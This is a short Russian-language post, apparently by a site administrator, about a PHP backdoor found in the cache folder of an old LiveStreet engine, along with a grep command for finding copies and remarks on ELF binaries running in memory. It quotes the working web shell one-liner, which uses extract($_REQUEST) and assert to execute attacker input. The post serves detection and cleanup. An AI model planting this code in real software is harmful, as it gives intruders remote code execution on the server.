В старом движке Livestreet нашёл давнюю уязвимость которая откуда-то взялаь и очень давно лежала в папке cache.
Но какой-то злоумышленник умудрился ей воспользоваться!
Выглядит как обычный php файл с содержанием типа

<?php extract($_REQUEST) && @assert(stripslashes($not)) && exit;

для поиска остальных фалов с подобным кодом использую команду

grep -r "assert(stripslashes" /srv/www/

Кстати из-за этой уязвимости начали находиться ЭЛЬФЫ (ELF).
В памяти сидят то удаляем их и снимаем процесс